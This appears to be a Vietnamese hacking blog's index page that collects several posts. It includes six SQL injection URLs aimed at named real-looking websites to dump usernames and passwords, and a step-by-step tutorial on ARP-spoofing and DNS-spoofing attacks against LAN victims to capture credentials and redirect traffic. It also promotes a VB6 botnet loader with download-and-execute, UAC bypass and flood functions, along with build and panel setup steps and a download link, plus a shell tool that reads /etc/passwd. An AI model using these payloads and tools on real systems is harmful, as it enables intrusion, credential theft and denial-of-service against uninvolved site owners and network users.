Exidous CMD Shell

Connect to shell
Exidous CMD Shell | Juno_okyo's Blog

Connected

XSA Tool

Getting Username
Exidous CMD Shell | Juno_okyo's Blog

Going to that directory
Exidous CMD Shell | Juno_okyo's Blog

Dir Listing
Exidous CMD Shell | Juno_okyo's Blog

Just For Fun (/etc/passwd)

Download

Xem Thêm

Smart Hunter v.1.4.3 Public Version

Download : http://adf.ly/FRrSF

Xem Thêm

6 Random Injections

1 

Mã:


http://www.elansystems.co.za/product-item.php?product_items_id=-11
 UNION SELECT 
1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username,
​0x3b,password),5,6,7,8,9,10 from users_tbl--

Mã:


http://www.nbjm-sprayer.com/products.php?id=-1
 UNION SELECT 
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1
​9,20,21,22,23 from user_table--

Mã:


http://www.mcdonaldlawoffice.net/story.php?articleid=-8
 UNION SELECT 
1,2,group_concat(name,0x3b,password),4,5,6,7,8,9,10,11,12,13,14,15,16 
from users--

Mã:


http://localtime.biz/product.php?cat_id=-1
 UNION SELECT 
1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(email,0x3b,
​pwd,0x3c,0x62,0x72,0x3e),4 from users--

Mã:

http://www.eltee.de/kolumnen_id.php?id=-30175 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

Mã:


http://www.media4world.de/mini_d/list_art.php?shop=-5
 UNION SELECT 
group_concat(username,0x3b,kwort,0x3b,admin,0x3c,0x62,0x72,0x3e) from 
user--

Xem Thêm

Projects CEH 95MB

http://data.ceh.vn/download/projects-ceh.vn.rar

Pass: giải nén : ceh.vn

Xem Thêm

The Debian Administrator’s Handbook

The BackTrack Team is proud to have contributed 1000 EUR to the Debian Administrator’s Handbook liberation fund. This book, written by two Debian developers, is a welcome addition to any administrator’s bookshelf. Debian is very popular on servers and it’s also the base distribution from which BackTrack is forged.
Security is not in rest in this book since a full chapter is dedicated to the topic. It covers setting up a firewall, monitoring, intrusion detection systems, setting up SELinux policies, dealing with a compromised machine, and gives many thoughful advice to define a security policy within your organization.

The authors have pledged to release the book under an open source license if the associated “liberation fund” reaches 25,000 EUR. Today, there’s less than 3,000 EUR to raise and we invite you to contribute as well. By giving 10 EUR or more, you’ll get a copy of the ebook as soon as it’s available (even if the liberation fund is not completed). Click here to contribute now.

The book is planned to be released in April but in the mean time you can have a peek at a sample chapter and the full table of contents. We have no doubt that this book will provide a solid foundation to all those looking to better understand Debian, BackTrack and Linux at large.

Nguồn: backtrack-linux.org

LINKDOWN EBOOK

Trích dẫn: http://debian-handbook.info/get/now/

http://www.fshare.vn/file/T059CNM8ST/

Xem Thêm

- Site lỗi SQL

Xem Thêm

Ebook Collection [Linux, Exploits, Networking, Programming]

EBOOKS INCLUDED

Exploit Folder

Extreme Exploits - Advanced Defenses Against Hardcore Hacks
Hacking - The Art Of Exploitation
Shellcoder's Programming Uncovered
The Shellcoder's Handbook - Discovering And Exploiting Security Holes

Programming Folder

Hacker Disassembling Uncovered
Learning PHP & MySQL
Michael - Mastering UNIX Shell Scripting

C / C++

C By Example
C In a Nutshell
C Primer Plus, 5th Edition
C-C++ Programmer's Reference, 3rd Edition
Cryptography In C And C++
Effective C++, 3rd Edition
Optimizing C++
Programming Embedded Systems In C And C++
Secure Programming Cookbook For C And C++

Linux

Assembly Language Step-By-Step - Programming With DOS And Linux, 2nd Edition
Beginning Linux Programming
Burtch - Linux Shell Scripting with Bash
Glass,Ables - Linux for Programmers and Users
Guide To Assembly Language Programming In Linux
Korn Shell Unix and Linux Programming Manual,
Matthew - Beginning Linux Programming
Mitchell - Advanced Linux Programming
Wall - Linux Programming Unleashed

Perl

Advanced Perl Programming, 2nd Edition
Beginning Perl Web Development - From Novice To Professional
Intermediate Perl
Learning Perl Objects, References, & Modules
Learning Perl, 4th Edition
Minimal Perl For UNIX And Linux People
Perl Best Practices
Perl Hacks - Tips And Tools For Programming Debugging And Surviving
Perl Medic - Transforming Legacy Code

Hacking Folder

Hacker Linux Uncovered
Hacker's Delight
Hacker's Guide
Hacker's Handbook
Hackers_Secrets
Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition
Hacking For Dummies
Honeypots - Tracking Hackers
The Art Of Intrusion - The Real Stories Behind The Exploits Of Hackers, Intruders, And Deceivers

Web

Firefox Hacks - Tips & Tools For Next-Generation Web Browsing
Google Hacking For Penetration Testers
Google Hacks, 3rd Edition
Hacker Web Exploitation Uncovered
Web Hacking - Attacks And Defense

Networking Folder

Advanced Linux Networking
Hack The Stack - Using Snort And Ethereal To Master The 8 Layers Of An Insecure Network
OpenVPN - Building And Integrating Virtual Private Networks

Programming

Illustrated TCP-IP - A Graphic Guide To The Protocol Suite
Prentice Hall - Internetworking with TCP-IP, Volume I - Principles, Protocols and Architecture
Prentice Hall - Internetworking with TCPIP - Vol 3 Client-Server Programming and Applications for the BSD Sockets Version.
Tcp Ip For Dummies
TCP-IP Foundations (2004)
TCP-IP Network Administration,
TCPIPTools
Understanding TCP-IP
Unix Network Programming - Volume I - The Sockets Networking API,

Security

Cryptography And Network Security,
Designing And Implementing Linux Firewalls And QoS
Firewall Policies And VPN Configurations
Fundamentals of Network Security
LANSecurity
Maximum Computer Security-A Hacker's Guide to Protecting Your Internet Site and Network
McGraw Hill - Hacking Exposed - Network Security, Secrets and Solutions, 3rd Ed
Network Security Assessment - From Vulnerability To Patch
Network Security Hacks - 100 Industrial-Strength Tips & Tools,
Network Security With OpenSSL
Self-Defending Networks - The Next Generation Of Network Security

Unix Folder

BSD

Absolute BSD - The Ultimate Guide To FreeBSD
Absolute OpenBSD - Unix For The Practical Paranoid
Embedded FreeBSD Cookbook (2002)
Learning the UNIX Operating System
Mastering FreeBSD And OpenBSD Security
SysAdmin - Security Tools in FreeBSD
Teach Yourself FreeBSD In 24 Hours
The Complete FreeBSD, 4th Edition
The OpenBSD 4.0 Crash Course
Unix Power Tools, 3rd Edition

Kernel

linuxKernelSux
OReilly.Understanding.The Linux Kernel 1st Edition
Understanding The Linux Kernel, 3rd Edition

Linux

A Practical Guide To Linux Commands, Editors, And Shell Programming
Get_Acquainted_with_Linux_Security_and_Optimizatio n_System
Hack Proofing Linux - A Guide To Open Source Security
Linux Basic Commands
Linux Kernel Development, 2nd Edition
Linux Kernel module programming guide 1
Linux Shell Scripting With Bash (2004)
Linux_Administration_Made_Easy
Linux_Administrators_Security_Guide
McGraw.Hill.HackNotes.Linux.and.Unix.Security.Port able.Reference.eBook-DDU
OReilly - Linux_Network_Administrator's_Guide_Second_Edition
Sam teach you Linux in 24 hours
Securing Linux A Survival Guide for Linux Security Version 1.0 2003
Securing Linux Servers for Service Providers
SELinux (2004)

Shell

shell-scripting
tcsh
Unix Shell Programming, 3rd Edition (2003)

SQL Folder

Mastering_MySQL_4.2003.Sybex
MySQL - 2nd Edition (Sams)
MySQL - Essential Skills (2004)
MySQL - Visual QuickStart Guide, 2nd Edition (2006)
MySQL Certification Study Guide (2004)
MySQL Cookbook (2002)
MySQL Cookbook
MySQL Pocket Reference (2003)
MySQL Tutorial (2003)
MySQL.PHP.Database.Applications
SQL - A Beginner's Guide, 2nd Edition (2003)
SQL - Practical Guide For Developers (2005)
SQL Bible (2003)
SQL Cookbook (2005)
SQL For Dummies, 6th Edition (2006)
SQL Sams Teach Yourself MySQL in 21 Days -- SAMS
SQL Server 2000

DOWNLOAD

http://www.multiupload.com/0UTEX76FE9

Nguồn: hackforums.net

Xem Thêm

[TUT] SQL dạng HTML

Mất ngủ dậy sớm làm cái tut SQL dạng HTMl cho anh em

Link Download
http://www.mediafire.com/?6hh2ykae8xpuq2q

Hoặc
https://www.box.com/s/3m0xluf10xdhcdw95qzu

kakavn

Xem Thêm

Thủ thuật phá phách trong mạng LAN

Chuẩn bị :
_ Backtrack 5 R3 (cái này cài lên máy ảo cho dễ xài.

_ Trên windows các bạn có thể dủng cain & abel để làm điều tương tự nhưng có thể ko linh động bằng
Link download BT : http://www.backtrack-linux.org/downloads/

_ Kết nối mạng LAN (tất nhiên )
_ Victim (cái này hơi thừa )

Phương pháp:

_Phương pháp là mình sử dụng có tên là Man-in-the-middle (MITM), phương pháp này rất hữu dụng và nguy hiểm cho người khác nếu attacker sử dụng giỏi. Bạn có thể :

+ Lấy được thông tin gửi đi từ máy victim (ID:pass, cookie, URL...)
+ Kiểm soát toàn bộ về mạng của victim, nói chung là ta làm chủ mạng.
Trong bài này mình sẽ hướng dẫn cách redirect mạng victim

Giới thiệu về MITM:

Trong bài viết này giả sử ta có 1 mạng LAN với :

Router ( IP:192.168.0.1)
Attacker ( IP:192.168.0.117)
Victim ( IP:192.168.0.104)

Lưu ý : các bạn muốn tìm được IP của victim thì sử dụng các chương trình scan mạng sẽ thấy hoặc sử dụng Nmap có sẵn của Backtrack ( hướng dẫn ở cuối bài )

Nguyên lý ở đây là ta sẽ mạo danh thành :
+ Đồi với máy victim : ta giả làm router
+ Đối với router : ta giả làm máy victim
Sơ đồ :
Bình thường :

Router <==> Victim
/\
||
||
\ /
Attacker

MITM:

Router <==> Attacker <==> Victim

Thực hiện:

Toàn bộ các bước sau đều thực hiện trong Terminal của Backtrack !!!

Đầu tiên ta port forward IP để không DOS mạng LAN do sự cố ( cái này mình chưa bị lần nào nhưng cứ cẩn thận vẫn hơn)

Code:

Mã:

echo 1 > /proc/sys/net/ipv4/ip_forward

Sau đó ta gõ :

+ Trường hợp 1 ( biết được IP victim và nhắm tới chỉ 1 victim đó thôi ):

Code:

Mã:

arpspoof -i <interface> -t <victim ip> <router ip>

mở terminal khác và gõ :

Code:

Mã:

arpspoof -i <interface> -t <router ip> <victim ip>

+ Trường hợp 2 ( nhắm đến toàn mạng ):

Mã:

arpspoof -i <interface> <router ip>

Trường hợp 2 mọi người nhớ cẩn thận nếu như nhiều người trong mạng quá có thể gây DOS.

Redirect :

Sau khi hoàn thành bước MITM ta tiếp tục đến phần phá phách :

Mình sẽ sử dụng phương pháp DNS Spoofing để redirect victim qua những web site do ta định sẵn :

Đầu tiên ta tạo 1 file txt, trong đó ta gõ theo cú pháp :

<ip> <website>

với <ip> là IP của website mà ta muốn redirect victim đến, 
<website> là những website mà khi victim truy cập sẽ bị redirect 
sang web của ta.

Ví dụ:

127.0.0.1 www.google.com ( redirect vào localhost )

-hoặc-

74.125.224.46 www.facebook.com ( khi victim vào facebook.com sẽ bị chuyển qua google.com)

ta có thể sử dụng dấu * như 1 cách "bao gồm toàn bộ", chẳng hạn:

74.125.224.46 www.*.com (toàn bộ trang web bắt đầu bằng www và kết thúc bằng .com sẽ bị chuyển hướng)

Sau khi ta tạo file text, ta mở Terminal khác và gõ :

Code:

[code]dnsspoof -i <interface> -f <đường dẫn đến file txt mới tạo>

Và sau đó ta ngồi chờ và xem kết quả.
<<----KẾT THÚC---->>

<interface> : là card mạng sử dụng(thông thường là eth0 hoặc wlan0 nếu như sử dụng wifi). Các bạn có thể check với câu lệnh:
Code:

ifconfig

[Hình: 1.png]

Hướng dẫn Scan IP:

Bạn mở Terminal lên và gõ :
Code:

Mã:

nmap -T4 -O <ip>/24

Trong đó:
-T4 : chọn scan IPv4
-O : chọn scan hệ diều hành

Ví dụ: IP nhà mình bắt đầu bằng 192.168.0.xxx thì ta gõ :
Code:

Mã:

nmap -T4 -O 192.168.0.0/24

lưu ý là ta gõ số 0 ở bit cuối cùng của IP, thay cho xxx. "/24" là prefix, cứ gõ nó vào dể scan toàn bộ mạng.

Kết quả là bạn sẽ nhận được 1 list IP trong mạng và hệ điều hành, nếu scan được.

Cách hóa giải khi làm xong :

Phía Attacker:
Ở mỗi Terminal bấm Ctrl+C để terminate, chương trình sẽ tự động set lại các giá trị.

Phía Victim:
Đợi 5 phút
-hoặc-
Start-Run-Cmd :
Code:

ipconfig/flushdns

<//-----@|-Update-|@-----\\>

Hướng dẫn config card mạng cho Virtual Box để sử dụng ==> Phải đọc<== (lý do là nếu không config mà để mặc định thì khi tấn công máy victim sẽ mất kết nối internet):

[Hình: Screenshot+%282%29.png]

Chọn Setting

[Hình: Screenshot+%283%29.png]

Nhấp vào thẻ Network
Ở mục "Attach to :" chọn "Bridged Adapter" rồi chọn card mạng đang sử dụng.

[Hình: Screenshot+%284%29.png]

<<~~@\\_Update_//@~~>>

Link download Backtrack 5 R3 : http://www.backtrack-linux.org/downloads/

Xem Thêm

[ Share ] Code Bán Thẻ Online

Demo : http://buycard.vn
Code cũng nhẹ không nặng lắm . cho các bạn nào thích l
Link

Thanks giùm e để qa đợt thaNH lọc nha

Pass : Tommie

Xem Thêm

[OPEN SOURCE] vnLoader - HTTP Bot - DL/Exec, Update, Visit - [UDP | HTTP Flood] [VB6]

Hey guys!
I'm presenting my HTTP Bot called 'vnLoader' i was coding it about 1 year ago for a couple of months. I don't use it anymore so I gonna share this with you.
It only lays around on my computer. So why not giving something to the community.

About the Bot:

Coded in VB6
Startup (of course)
Mutex (of course)
Copy & Paste UAC Bypass
Commands:
- Download & Execute
- Update
- Remove
- Visit Website (visible/hidden)
- UDP Flood
  > attacks random ports
- HTTP Flood
  > if server is vulnerable to Slowloris -> Slowloris attack
  > else -> HTTP Get Flood
Uses Sockets to connect!

About the Webpanel:

Coded in PHP ( + a bit Javascript )
High customizable taskcreation
Statistics, Botlist, Tasklist, etc.
Account system (take a look at the picture below)

Screenshots of the Webpanel:

Attention - big images!

Statistics (Click to View)
Botlist (Click to View)
Task creation (Click to View)
Account managements (Click to View)

How to install the Webpanel:

1. Create a mysql database (won't explain how that works)
2. After downloading the source browse to your php files.
3. Open "sql.inc.php" and configure it to your mysql server/database

PHP Code:

@mysql_connect("dbserver", "dbusername", "dbpassword"); @mysql_select_db("dbname");
4. Upload everything to your webserver
5. Browse in your Internet Browser to http://yourserver.com/yourwebpanel/install.php
6. Enter a username and a password for your webpanel and click "Install". Wait until the script is done.

How to compile the bot:

1. Open the project in your Visual Basic 6.0 IDE
2. Search for "Form_Load" in Form1
3. Configure it like this.

Code:

'FOR EXAMPLE OUR WEBPANEL IS HERE: http://someserver.com/vnloader/ Server = "someserver.com" 'Your Domain (without: "http://" or "www.") Prefix = "/vnLoader/" 'Path to the folder of the webpanel Password = "updateandremovepassword" 'Password for the update command Mutex = "Something Random Here" 'Mutex StartUp = "Startupkey" 'Startupkey
4. Compile
5. ???
6. Profit

Download:

http://www.mediafire.com/?i1fgaz842c9c9l8
Don't ask for virusscans these are only sourcecodes!

Enjoy anyone (:
If you have questions ask here in thread, do not PM me since PM limit is 50, wich is reached fastly.
Also search in the thread if you have problems. Maybe someone already solved them :b

Ahhh, by the way what i almost missed.
I'm not responsible for what you do with this :P

Trang

Exidous CMD Shell

Xem Thêm

Smart Hunter v.1.4.3 Public Version

Xem Thêm

6 Random Injections

Xem Thêm

Projects CEH 95MB

Xem Thêm

The Debian Administrator’s Handbook

Xem Thêm

- Site lỗi SQL

Xem Thêm

Ebook Collection [Linux, Exploits, Networking, Programming]

Xem Thêm

[TUT] SQL dạng HTML

Xem Thêm

Thủ thuật phá phách trong mạng LAN

Xem Thêm

[ Share ] Code Bán Thẻ Online

Xem Thêm

[OPEN SOURCE] vnLoader - HTTP Bot - DL/Exec, Update, Visit - [UDP | HTTP Flood] [VB6]

Xem Thêm

Vài lời cho các bạn !

Chuyên Mục

Bạn Đã Xem Chưa

Bài đăng phổ biến

Liên Kết